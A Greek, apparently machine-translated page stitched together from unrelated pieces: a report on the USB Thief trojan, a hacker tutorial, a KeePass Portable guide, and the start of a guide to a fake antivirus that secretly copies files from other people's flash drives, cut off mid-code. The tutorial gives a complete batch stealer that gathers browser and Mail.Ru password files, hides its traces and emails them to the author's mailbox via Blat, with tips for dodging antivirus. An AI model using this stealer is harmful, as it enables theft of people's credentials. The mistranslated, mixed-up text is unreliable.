Ένας εξαιρετικά ασυνήθιστος Trojan: το κακόβουλο λογισμικό ονομάστηκε USB Thief (Win32/PSW.Stealer.NAI). Το κακόβουλο λογισμικό επικεντρώνεται στην κλοπή δεδομένων, εξαπλώνεται και λειτουργεί σε συνηθισμένες μονάδες flash και επίσης κρύβει επιδέξια τα ίχνη της παρουσίας του στο σύστημα. Το Trojan είναι ιδανικό για κατασκοπεία στον κυβερνοχώρο, καθώς μπορεί να φτάσει ακόμη και σε συστήματα που είναι απομονωμένα από το δίκτυο, εάν μπορεί να συνδεθεί μια μονάδα USB σε αυτά.

Σε αντίθεση με άλλες απειλές USB που μένουν στην εκκίνηση και στη δημιουργία συντομεύσεων εφαρμογών για να ξεκινήσει το κακόβουλο λογισμικό, το USB Thief λειτουργεί διαφορετικά. Το Trojan έχει σχεδιαστεί για να εκμεταλλεύεται το γεγονός ότι οι χρήστες συχνά αποθηκεύουν φορητές εκδόσεις εφαρμογών όπως Firefox, NotePad++, TrueCrypt και ούτω καθεξής σε μονάδες flash. Το κακόβουλο λογισμικό είναι προσεκτικά ενσωματωμένο στην αλυσίδα λήψης τέτοιων προγραμμάτων, παρουσιάζοντας ως πρόσθετο ή αρχείο DLL. Έτσι, όταν ένας χρήστης εκκινεί μια οικεία εφαρμογή από μια μονάδα flash, μαζί της εκκινείται και ένας Trojan (στο παρασκήνιο).

Ο άγνωστος συγγραφέας του κακόβουλου λογισμικού φρόντισε σοβαρή προστασία για την ανάπτυξή του. Το USB Thief συνδέεται σε κάθε μολυσμένη μονάδα flash χρησιμοποιώντας το μοναδικό αναγνωριστικό και τις ρυθμίσεις μονάδας δίσκου. Ορισμένα από τα αρχεία του Trojan προστατεύονται με κρυπτογράφηση AES128 και το κλειδί δημιουργείται με βάση τις μοναδικές παραμέτρους της συσκευής. Επίσης, τα ονόματα των αρχείων κακόβουλου λογισμικού διαφέρουν σε κάθε περίπτωση: δημιουργούνται με βάση τα περιεχόμενα της μονάδας flash και τη στιγμή που δημιουργήθηκαν τα αρχεία. Όταν προσπαθείτε να αντιγράψετε το USB Thief σε άλλη μονάδα flash ή κανονικό σκληρόδίσκου, αυτό το σύστημα προστασίας δύο σταδίων θα αποτρέψει τη λειτουργία κακόβουλου λογισμικού και θα περιπλέξει επίσης σοβαρά την αντίστροφη μηχανική.

Τρωική δομή

Το USB Thief λειτουργεί απευθείας από τη μονάδα flash και δεν αφήνει ίχνη στο ίδιο το σύστημα. Το Trojan αποτελείται από έξι αρχεία, τέσσερα από τα οποία είναι εκτελέσιμα και δύο περιέχουν δεδομένα διαμόρφωσης. Ο πρώτος φορτωτής είναι υπεύθυνος για την εκκίνηση του Trojan μαζί με μια φορητή έκδοση ενός προγράμματος. Ελέγχει τη συσκευή USB και βεβαιώνεται ότι μπορεί να γράψει τις κλεμμένες πληροφορίες σε αυτήν και να τις αποθηκεύσει εδώ. Στη συνέχεια ξεκινά ο δεύτερος φορτωτής. Ελέγχει τα ονόματα των γονικών διεργασιών και βεβαιώνεται ότι εκτελείται σε κανονικό περιβάλλον (και κανείς δεν προσπαθεί να το αναλύσει). Ο τρίτος φορτωτής, με τη σειρά του, ελέγχει για ιούς στο σύστημα.

Το τελευταίο, τέταρτο ωφέλιμο φορτίο που είναι ενσωματωμένο τρέχουσα διαδικασία, είναι άμεσα υπεύθυνος για την κλοπή δεδομένων. Το USB Thief κλέβει έγγραφα, εικόνες, λίστα αρχείων από όλους τους διαθέσιμους δίσκους, δεδομένα Μητρώο των Windowsκαι πληροφορίες που συλλέγονται από το WinAudit. Όλα τα κλεμμένα δεδομένα αποθηκεύονται σε μια μονάδα flash και κρυπτογραφούνται χρησιμοποιώντας ελλειπτική κρυπτογραφία.

Οι ειδικοί της ESET σημειώνουν ότι οι επιθέσεις από χρησιμοποιώντας USBΟ κλέφτης δεν είναι ακόμη κοινή πρακτική. Ωστόσο, το Trojan είναι πολύ επικίνδυνο, καθώς είναι δύσκολο να ανιχνευθεί η παρουσία του και μετά την αφαίρεση της μονάδας USB, δεν παραμένουν καθόλου ίχνη κλοπής πληροφοριών. Η έκθεση της εταιρείας αναφέρει επίσης ότι ο συντάκτης του κακόβουλου λογισμικού, εάν το επιθυμεί, μπορεί να «επαναπροσδιορίσει» το κακόβουλο λογισμικό του αντικαθιστώντας το ωφέλιμο φορτίο για κλοπή δεδομένων με οποιοδήποτε άλλο κακόβουλο λογισμικό.

Σε αυτό το άρθρο θα περιγράψω πόσο γρήγορα και χωρίς ιδιαίτερη δυσκολία, γράψτε και φτιάξτε έναν ιό που κλέβει αρχεία με κωδικούς πρόσβασης και τα στέλνει όλα στο γραμματοκιβώτιο.
Ας ξεκινήσουμε με το γεγονός ότι ο ιός θα γραφτεί στο bat "e (CMD, μπορείτε να πάρετε τις βασικές εντολές) δηλαδή στα συνηθισμένα αρχείο κειμένουκαι θα εκτελεστεί χρησιμοποιώντας τον τυπικό, ενσωματωμένο διερμηνέα των Windows - "γραμμή εντολών".
Για να γράψετε έναν τέτοιο ιό, πρέπει να γνωρίζετε την ακριβή θέση αποθήκευσης αυτών των αρχείων που θα κλέψει, στοιχεία Blat που μπορούν να ληφθούν από τον ιστότοπο εκτός http://www.blat.net/ ή από τον διακομιστή μας, όπως καθώς και ένα στοιχείο από το αρχείο αρχειοθέτησης WinRaR Rar.exe (μπορείτε να το κάνετε χωρίς αυτό).
Ανοίξτε το σημειωματάριο και αντιγράψτε τον ακόλουθο κώδικα σε αυτό:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" αντιγραφή /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" αντίγραφο /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat αντίγραφο /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozill a\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite αντίγραφο /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\ rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot %\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Κωδικός πρόσβασης ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -επισύναψη %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat. exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls

Δεν θα γράψω πολλά από τον κώδικα του ίδιου του Batinka.
@echo off - κρύβει το σώμα του πισνού (άρα δεν χρειάζεται, αλλά ακόμα)
md %systemroot%\wincs - δημιουργεί έναν φάκελο wincs φάκελο συστήματος Windows, ανεξάρτητα από τη μονάδα δίσκου στην οποία είναι εγκατεστημένη ή ποια είναι η ονομασία τους.
md %SystemDrive%\pass\ - δημιουργεί έναν φάκελο πρόσβασης στη μονάδα δίσκου όπου είναι εγκατεστημένα τα Windows.
md %SystemDrive%\pass\opera\ - δημιουργεί το φάκελο opera από όπου το wand.dat και τα cookies4.dat Πρόγραμμα περιήγησης Opera(έως και 11* εκδόσεις, η opera αποθηκεύει τους κωδικούς πρόσβασης στο αρχείο wand.dat)
md %SystemDrive%\pass\Mozilla\- δημιουργεί έναν φάκελο Mozilla από τον οποίο προέρχονται τα αρχεία Το πρόγραμμα περιήγησης Mozilla(cookies.sqlite ,key3.db ,signons.sqlite ) στα οποία αποθηκεύονται οι κωδικοί πρόσβασης.
md %SystemDrive%\pass\MailAgent\- δημιουργεί έναν φάκελο MailAgent στον οποίο θα αντιγραφούν αρχεία που περιέχουν το ιστορικό της αλληλογραφίας και τα κλειδιά μητρώου (αποθήκευση κωδικών πρόσβασης) από το Mail Agent.
md %SystemDrive%\pass\MailAgent\reg- δημιουργεί ένα φάκελο reg
Attrib %systemroot%\wincs +h +s +r- τοποθετεί χαρακτηριστικά στο φάκελο wincs, αποκρύπτοντάς τον έτσι από την προβολή.
Attrib %SystemDrive%\pass +h +s +r- το ίδιο με το παραπάνω.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- αντιγράφει το αρχείο blat.exe από τη θέση λήψης στον φάκελο wincs
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- αντιγράφει το αρχείο blat.dll από τη θέση λήψης στον φάκελο wincs
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- αντιγράφει το αρχείο blat.lib από τη θέση λήψης στον φάκελο wincs
CD /D %APPDATA%\Opera\Opera\ - πηγαίνει στο φάκελο opera όπου βρίσκονται αρχεία με κωδικούς πρόσβασης (και όχι μόνο) από την opera.
αντιγραφή /y wand.dat %SystemDrive%\pass\opera\wand.dat- αντιγράφει το αρχείο wand.dat στο φάκελο opera
αντιγραφή /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- αντιγράφει το αρχείο cookie4.dat στο φάκελο opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- εξάγει το κλειδί μητρώου magent_logins2 όπου είναι αποθηκευμένος ο κωδικός πρόσβασης στον φάκελο reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- εξάγει το κλειδί μητρώου magent_logins3 όπου είναι αποθηκευμένος ο κωδικός πρόσβασης στον φάκελο reg
CD / D %APPDATA% - μεταβείτε στο φάκελο AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- αντιγράφει τα περιεχόμενα του φακέλου Mra\Base στο φάκελο MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- αντιγράφει το αρχείο ver.txt στο φάκελο MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- μεταβείτε στο φάκελο με το προφίλ του προγράμματος περιήγησης Mozilla
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- αντιγράφει το αρχείο cookies.sqlite στο φάκελο Mozilla
αντιγραφή /y key3.db %SystemDrive%\pass\Mozilla\key3.db- αντιγράφει το αρχείο key3.db στο φάκελο Mozilla
αντιγραφή /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- αντιγράφει το αρχείο signons.sqlite στο φάκελο Mozilla
αντιγραφή /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- αντιγράφει το στοιχείο αρχειοθέτησης WinRar Rar.exe στο φάκελο pass
del /s /q %SystemRoot%\Rar.exe- αφαιρεί το στοιχείο αρχειοθέτησης από το φάκελο των Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- αρχειοθετήστε τα περιεχόμενα του φακέλου pass
αντιγραφή /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rarαντιγράψτε το αρχείο που δημιουργήθηκε στον φάκελο wincs
cd %systemroot%\wincs - μεταβείτε στο φάκελο wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Κωδικός πρόσβασης - προετοιμάζει το πρόγραμμα Blat για να στείλει το αρχείο καθορίζοντας τα δεδομένα για εξουσιοδότηση και στέλνοντας την επιστολή. Μην ξεχάσετε να καθορίσετε τα δεδομένα σας από το γραμματοκιβώτιο από το οποίο θα είναι η επιστολή με το αρχείο Απεσταλμένα.
ren *.rar pass.rar - σε περίπτωση που το αρχείο δεν πήρε λάθος όνομα κατά τη διάρκεια της διαδικασίας, θα το μετονομάσουμε ξανά σε pass.rar
%systemroot%\wincs\blat.exe -body Files Κωδικός πρόσβασης -to [email protected] -επισύναψη %systemroot%\wincs\pass.rar- υποδείξτε σε ποια ταχυδρομική διεύθυνση θα σταλεί η επιστολή και στείλτε την.
rmdir /s /q %SystemDrive%\pass- διαγράψτε το φάκελο pass
rmdir /s /q %systemroot%\wincs- διαγράψτε το φάκελο wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- αφαιρέστε τα στοιχεία Blat από το φάκελο των Windows.
del /s /q %systemroot%\blat.lib- αφαιρέστε τα στοιχεία Blat από το φάκελο των Windows.
attrib +a +s +h +r %systemroot%\wind.exe- βάζουμε χαρακτηριστικά στον εαυτό μας, κρύβοντας έτσι τον εαυτό μας από τα μάτια.
EXIT - ολοκληρώστε τη διαδικασία batink και βγείτε.
cls - διαγράψτε την έξοδο οποιωνδήποτε γραμμών στον intraperator.
Αντιγράφηκε, αποθηκεύστε ως wind.bat και μεταγλωττίστε στο exe χρησιμοποιώντας Προγράμματα νυχτερίδωνσε μετατροπέα exe, τότε συλλέγουμε τα πάντα μαζί, δηλαδή παίρνουμε τα στοιχεία του προγράμματος Blat και το στοιχείο αρχειοθέτησης WinRar (μπορείτε να το κατεβάσετε) και το κολλάμε σε ένα εκτελέσιμο αρχείο ή με κάποιο πρόγραμμα, η διαδρομή για την εκφόρτωση όλων των αρχείων πρέπει be% SystemRoot% ή% WindowsDir % ή %windir% .
Ως αποτέλεσμα, λαμβάνουμε έναν ιό που δεν θα πυροδοτηθεί από προγράμματα προστασίας από ιούς και θα στείλει ένα αρχείο με αρχεία στην αλληλογραφία σας. Τα αρχεία που έρχονται στο ταχυδρομείο μπορούν να αποκρυπτογραφηθούν χρησιμοποιώντας ανάκτηση πολλαπλών κωδικών πρόσβασης, αν και όχι όλα, αλλά μόνο με ραβδί .dat από την όπερα και μετά αν δεν ενημερώθηκε σε εκδόσεις 11 *. Όλα τα άλλα αρχεία μπορούν να αποκρυπτογραφηθούν αντικαθιστώντας τα με δικά σας.
Νομίζω ότι αυτό είναι το τέλος, αν έχετε οποιεσδήποτε ερωτήσεις μη διστάσετε να ρωτήσετε.
Σας ευχαριστώ για την προσοχή σας, ό,τι καλύτερο!
©Swap TheHackWorld.in

Πολλές εταιρείες, συμπεριλαμβανομένης της Sony και της Adobe, έχουν ήδη πέσει θύματα χάκερ που έχουν κλέψει εκατομμύρια κωδικούς πρόσβασης και άλλα δεδομένα χρηστών. Η ανάλυση αυτών των πληροφοριών έδειξε ότι πολλοί χρήστες χρησιμοποιούν συχνά είτε αδύναμους κωδικούς πρόσβασης όπως "123456" ή τον ίδιο κωδικό πρόσβασης για πολλές υπηρεσίες. Αυτό διευκολύνει πολύ το έργο τους για τους χάκερ, και ταυτόχρονα, μια τέτοια απροσεξία μπορεί να γίνει κατανοητή: ποιος είναι σε θέση να θυμάται περισσότερους από δώδεκα σύνθετους κωδικούς πρόσβασης;

Μια απλή λύση θα μπορούσε να είναι ένα κομμάτι χαρτί κολλημένο κάτω από το πληκτρολόγιο. Κανένας χάκερ δεν θα μπορέσει να το καταπατήσει, αλλά θα πρέπει να παρακολουθείτε συνεχώς άτομα που βρίσκονται κοντά στον υπολογιστή σας. Και αυτό το φύλλο δεν είναι χρήσιμο εάν θέλετε να συνδεθείτε στον λογαριασμό σας από τον υπολογιστή κάποιου άλλου.

Το δωρεάν εργαλείο KeePass 2 Portable λύνει αυτό το δίλημμα. Για τη λειτουργία του χρειάζεστε μόνο μια μονάδα flash USB με 10 MB ελεύθερου χώρου, στην οποία θα εγκαταστήσετε ένα βοηθητικό πρόγραμμα. Στο μέλλον, θα χρειαστεί να θυμάστε μόνο έναν κωδικό πρόσβασης - από την προστατευμένη περιοχή της μονάδας flash. Εξάλλου, σε αυτό το KeePass αποθηκεύει τα δεδομένα σύνδεσης στις υπηρεσίες web σας με τη μορφή μιας κωδικοποιημένης τράπεζας δεδομένων, που προστατεύεται από έναν κύριο κωδικό πρόσβασης.

Οι Trojans που κλέβουν κωδικούς πρόσβασης δεν θα μπορούν να μυρίσουν τίποτα. Και επειδή δεν χρειάζεται πλέον να θυμάστε δεκάδες κωδικούς πρόσβασης, μπορείτε πραγματικά να χρησιμοποιήσετε έναν νέο για κάθε υπηρεσία web. ισχυρό κωδικό πρόσβασης. Τώρα θα σας πούμε λεπτομερώς πώς να χρησιμοποιήσετε το KeePass.

Πως να το κάνεις

1 Εγκαταστήστε ένα χρηματοκιβώτιο με κωδικό πρόσβασης


Εγκαταστήστε ένα χρηματοκιβώτιο με κωδικό πρόσβασης

Τοποθετήστε μια μονάδα flash USB στον υπολογιστή, δημιουργήστε έναν νέο φάκελο σε αυτόν και αντιγράψτε τα περιεχόμενα του αρχείου με το λογισμικό KeePass εκεί. Εκτελέστε το πρόγραμμα KeePass.exe. Μετά την εκκίνηση, ενεργοποιήστε αυτόματη αναζήτησηενημερώσεις κάνοντας κλικ στο "Ενεργοποίηση" στο αναδυόμενο παράθυρο. Στη συνέχεια, επιλέξτε "Προβολή | Αλλαγή γλώσσας" και κάντε κλικ στο "Λήψη περισσότερων γλωσσών".

Κατεβάστε το αρχείο της ρωσικής γλώσσας από τον ιστότοπο που ανοίγει κάνοντας κλικ στο "Ρωσικά | 2,25+". Εξαγάγετε τα περιεχόμενα του αρχείου σε μια μονάδα USB. Κάντε ξανά κλικ στο "Προβολή | Αλλαγή γλώσσας», επιλέξτε «Ρωσικά» και επανεκκινήστε το KeePass πατώντας το κουμπί «Ναι».

2 Δημιουργήστε μια νέα βάση δεδομένων κωδικών πρόσβασης


Δημιουργήστε μια νέα βάση δεδομένων κωδικών πρόσβασης

Επιλέξτε "Αρχείο | Νέο" και καθορίστε τη μονάδα USB ως αποθήκευση κωδικού πρόσβασης. Στο επόμενο παράθυρο, το πρόγραμμα θα σας ζητήσει να ορίσετε τον κύριο κωδικό πρόσβασης. Θα πρέπει να το εισάγετε κάθε φορά που ξεκινάτε το KeePass.

3 Ενεργοποίηση Προστατευμένης λειτουργίας


Ενεργοποίηση Προστατευμένης λειτουργίας

Για να αποτρέψετε τον Trojan να διαβάσει τον κωδικό πρόσβασής σας για το KeePass, θα πρέπει να χρησιμοποιήσετε την προστατευμένη λειτουργία του προγράμματος για να τον εισαγάγετε, παρόμοια με το UAC στα Windows 7. Για να το κάνετε αυτό, στο KeePass, μεταβείτε στα «Εργαλεία | Ρυθμίσεις | Ασφάλεια", μετακινηθείτε στο κάτω μέρος του παραθύρου και επιλέξτε το πλαίσιο δίπλα στο "Εισαγωγή κύριου κωδικού πρόσβασης σε ασφαλή λειτουργία".

4 Συμπληρώστε τη βάση δεδομένων με κωδικούς πρόσβασης


Συμπληρώστε τη βάση δεδομένων με κωδικούς πρόσβασης

Το KeePass μπορεί να ταξινομήσει τους κωδικούς πρόσβασης σε ομάδες. Από προεπιλογή, η νέα τράπεζα κωδικών πρόσβασης έχει ομάδες όπως "OS" ή "Internet". Για να δημιουργήσω νέα καταχώρηση, επιλέξτε την κατάλληλη ομάδα (ή δημιουργήστε μια νέα), κάντε δεξί κλικ στη λευκή περιοχή στα δεξιά και μετά κάντε κλικ στο «Προσθήκη καταχώρισης».

Συμπληρώστε όλα τα πεδία και κάντε κλικ στο OK. Δεδομένου ότι δεν χρειάζεται πλέον να θυμάστε κωδικούς πρόσβασης για να συνδεθείτε σε κάθε λογαριασμό, μπορείτε να ρυθμίσετε νέους, πιο σύνθετους που μπορούν να δημιουργηθούν, για παράδειγμα, στο passwort-generator.com.

5 Χρησιμοποιήστε αυτόματη εξουσιοδότηση


Εάν θέλετε να συνδεθείτε στην υπηρεσία χρησιμοποιώντας το KeePass, ανοίξτε την ομάδα όπου είναι αποθηκευμένος ο αντίστοιχος κωδικός πρόσβασης. Κάντε δεξί κλικκλικ του ποντικιού στην αντίστοιχη καταχώρηση αποθήκευσης Κωδικοί πρόσβασης KeePassκαι επιλέξτε "Έναρξη αυτόματης κλήσης" από την αναπτυσσόμενη λίστα. Μετά από αυτό, το πρόγραμμα θα μεταφέρει τα δεδομένα σας στο πρόγραμμα περιήγησης και το πρόγραμμα περιήγησης θα ανοίξει ένα νέο παράθυρο όπου θα συνδεθείτε στον λογαριασμό σας.

Λάβετε υπόψη ότι στο πεδίο "URL" πρέπει να εισαγάγετε τη διεύθυνση URL που συνήθως εισάγετε στο πρόγραμμα περιήγησης για εξουσιοδότηση, διαφορετικά η αυτόματη εισαγωγή κωδικού πρόσβασης μέσω του KeePass δεν θα λειτουργήσει.

6 Επεκτείνετε την εμπειρία σας στο KeePass


Επεκτείνετε την εμπειρία σας στο KeePass

Εάν θέλετε να επεκτείνετε τη λειτουργικότητα του KeePass, μεταβείτε στα "Εργαλεία | Ενότητες | Περισσότερες ενότητες», μετά την οποία θα ανακατευθυνθείτε στον ιστότοπο με χρήσιμες επεκτάσεις(τις συστάσεις μας μπορείτε να βρείτε στον παραπάνω πίνακα). Τώρα, κάνοντας κλικ στο όνομα του πρόσθετου, κατεβάστε το και εξαγάγετε το σε μια μονάδα flash.

Επανεκκινήστε το KeePass και μεταβείτε στα Εργαλεία | Ενότητες. Μια λίστα με τα διαθέσιμα πρόσθετα θα εμφανιστεί στο κάτω μέρος (μερικά από αυτά μπορούν να διαμορφωθούν).

Οι καλύτερες επεκτάσεις για το KeePass

Εξοπλίστε το χρηματοκιβώτιο σας με κωδικούς πρόσβασης Επιπρόσθετα χαρακτηριστικά, για παράδειγμα τη συνάρτηση Κρατήστε αντίγραφοή μετάδοση κωδικού πρόσβασης για κινητά τηλέφωνα.

Ονομα

Περιγραφή

Backup της βάσης δεδομένων Ορίζει την προστασία τράπεζας κωδικών πρόσβασης σε περίπτωση κλοπής ή απώλειας της μονάδας USB.
Twofish Cipher
KeeAgent Προσθέτει έναν αλγόριθμο κωδικοποίησης που είναι σχεδόν αδύνατο να σπάσει. Σημειώστε ότι αυτό θα κάνει το KeePass να λειτουργεί πιο αργά.
KeyExchanger Προσθέτει έναν αλγόριθμο κωδικοποίησης που είναι σχεδόν αδύνατο να σπάσει. Σημειώστε ότι αυτό θα κάνει το KeePass να λειτουργεί πιο αργά.
KeeForm Ανοίγει τους αγαπημένους σας ιστότοπους με το πάτημα ενός κουμπιού και συμπληρώνει αυτόματα τα στοιχεία σύνδεσής σας.

Για τους απλούς θνητούς, μια μονάδα flash είναι μια συσκευή για τη μεταφορά εγγράφων / ταινιών / φωτογραφιών και άλλων προσωπικών (και μερικές φορές πολύ προσωπικών) πληροφοριών. Αλλά για τους χάκερ, μια μονάδα flash είναι ταυτόχρονα θύμα και εργαλείο μάχης. Σήμερα θα σας πω όλες τις περιπλοκές της ανεπαίσθητης αποστράγγισης δεδομένων από μονάδες flash στον υπολογιστή μου και θα σας διδάξω επίσης πώς να μετατρέψετε τις αβλαβείς μονάδες flash σε προγράμματα για τη δημιουργία αντιγράφων ασφαλείας κωδικών πρόσβασης από έναν "μεγάλο" υπολογιστή.

Παγίδα για τις μονάδες flash άλλων ανθρώπων

Η ιδέα του προγράμματος "Evil Computer" θα είναι η εξής. Θα αναπτύξουμε ένα μικρό εργαλείο που θα προσποιείται ότι είναι ένα υπερ-μέγα προηγμένο antivirus, σκοπός του οποίου είναι η ποιοτική αφαίρεση «επικίνδυνων» ιών από μονάδες flash. Δεν θα εκπλήξετε κανέναν με μια μονάδα flash μολυσμένη από ιούς, επομένως το εξειδικευμένο "anti-virus" μας δεν θα προκαλέσει ανησυχία σε έναν αφελή χρήστη. Αντίθετα, εισάγετε μια μονάδα flash USB στον υπολογιστή σας και βλέπετε ένα μήνυμα όπως: «Εντοπίστηκε ιός. Κάνω μια λεπτομερή σάρωση όλων των αρχείων για την παρουσία μολυσμένων ", - θα περιμένει σίγουρα την ολοκλήρωση αυτής της λειτουργίας.

Προετοιμασία οργάνου

γράψε έτσι χρήσιμο πρόγραμμαθα είμαστε στο μοντέρνο πλέον C#. Η ευελιξία της γλώσσας και η πλούσια λειτουργικότητα της πλατφόρμας .NET σας επιτρέπουν να αναπτύσσετε εφαρμογές με αστραπιαία ταχύτητα. Αυτό ακριβώς χρειαζόμαστε. Μας ενδιαφέρει η συγκομιδή που μπορούμε να τρυγήσουμε, όχι η κουραστική διαδικασία κωδικοποίησης.

Ένα από τα σημαντικά στοιχεία της εφαρμογής μας θα είναι η διεπαφή. Όσο πιο σταθερά το κάνετε, τόσο πιο πιθανό είναι το θύμα να μην παρατηρήσει τη σύλληψη και να περιμένει ήρεμα την ολοκλήρωση της σάρωσης κατά των ιών. Δεν ασχολήθηκα πολύ και τοποθέτησα μόνο μια εικόνα και ένα ProgressBar στη μορφή ενός καθαρού έργου. Μπορείτε να έχετε μια έκρηξη και να κάνετε ένα εντυπωσιακό σχέδιο. Σας συμβουλεύω να δείτε τη σχεδίαση κάποιου πραγματικού antivirus και να σχεδιάσετε την εφαρμογή σας με περίπου το ίδιο στυλ.

Θέσαμε το καθήκον

Θα υποθέσουμε ότι έχουμε αποφασίσει για οργανωτικά ζητήματα και τον αλγόριθμο δράσης, ήρθε η ώρα να συζητήσουμε τις τεχνικές αποχρώσεις. Έτσι, το antivirus μας θα πρέπει να ξεκινήσει τη βρώμικη δουλειά του κατά την εγκατάσταση της μονάδας flash. Μια φορά νέος δίσκοςεμφανίζεται στο σύστημα, το πρόγραμμά μας πρέπει να καθορίσει το γράμμα του και να ξεκινήσει την αντιγραφή.

Πριν αναλάβω να γράψω αυτό το άρθρο, έπεσα πάνω στον πηγαίο κώδικα για ένα τέτοιο πρόγραμμα. Ο συγγραφέας του παραδείγματος προσδιόρισε την παρουσία μονάδας flash απαριθμώντας περιοδικά όλους τους δίσκους για την παρουσία μιας μονάδας δίσκου του τύπου " αφαιρούμενα μέσα". Στην αρχή σκέφτηκα να ακολουθήσω τον ίδιο δρόμο, αλλά μια εσωτερική φωνή υποδήλωνε παραλογισμό. Αφού ζύγισα όλα τα «υπέρ» και όλα τα «καλά, είναι ανοιχτό», απέρριψα αυτήν την ιδέα και πήγα μια βόλτα στο MSND. Πέντε λεπτά αργότερα αποδείχθηκε ότι το είχα κάνει για καλό λόγο. Η απάντηση βρέθηκε!

Χωρίς WinAPI, πουθενά…

Ο πιο αποτελεσματικός τρόπος για να μάθετε για τη σύνδεση νέου εξοπλισμού (στην περίπτωσή μας, μονάδων flash) είναι να πιάσετε και να αναλύσετε το μήνυμα WM_DEVICECHANGE. Κατά την εγκατάσταση της συσκευής, το μήνυμα αποστέλλεται σε όλα τα παράθυρα, και μπορούμε εύκολα να το επεξεργαστούμε στην εφαρμογή μας. Για να γίνει αυτό, αρκεί απλώς να περιγράψουμε τη συνάρτηση WindowProc. Στην πράξη μοιάζει με αυτό:

LResult CALLBACK WindowProc (HWND hwnd, //αναγνωριστικό παραθύρου UINT uMsg, //αναγνωριστικό μηνύματος WPARAM wParam, //συμβάν που συνέβη LPARAM lParam //δείκτης στη δομή που περιέχει δεδομένα)

Στο σώμα της συνάρτησης, πρέπει να συγκρίνετε την τιμή της παραμέτρου WParam με τα αναγνωριστικά διαφόρων συμβάντων που σχετίζονται με το μήνυμα WM_DEVICECHANGE. Για το παράδειγμά μας, αυτά θα ήταν:

  • DBT_DEVICEARRIVAL - προστέθηκε εξοπλισμός
  • DBT_DEVICEREMOVECOMPLETE - Το υλικό έχει καταργηθεί πλήρως
  • Εντάξει, ξέρουμε πώς να αποδείξουμε το γεγονός της σύνδεσης νέου εξοπλισμού, αλλά πώς να βεβαιωθούμε ότι συνδέσατε μια μονάδα flash USB; Υπάρχουν πολλές συσκευές hot-pluggable (για usb μιλάω) (εκτυπωτής, σαρωτής, μόντεμ κ.λπ.). Ευτυχώς, αυτό το πρόβλημα λύνεται πολύ απλά. Χρησιμοποιώντας την παράμετρο LParam, μπορούμε να αναφερθούμε στη δομή _DEV_BROADCAST_HDR, η οποία έχει ένα πεδίο dbch_devicetype. Εδώ, με βάση την αξία αυτού του πεδίου, εξάγονται τα κατάλληλα συμπεράσματα. Αν είναι ίσο με DEV_DEVTYP_VOLUME, τότε ήρθε η ώρα να χαρείτε και να χτυπήσετε τα χέρια σας - μια μονάδα flash έχει συνδεθεί σε εμάς!

    Typedef struct _DEV_BROADCAST_HDR ( DWORD dbch_size; //DWORD μέγεθος δομής dbch_devicetype; //Τύπος συσκευής DWORD dbch_reserved; //Δεσμευμένος, δεν χρησιμοποιείται )DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR, *PDEV_BROADC

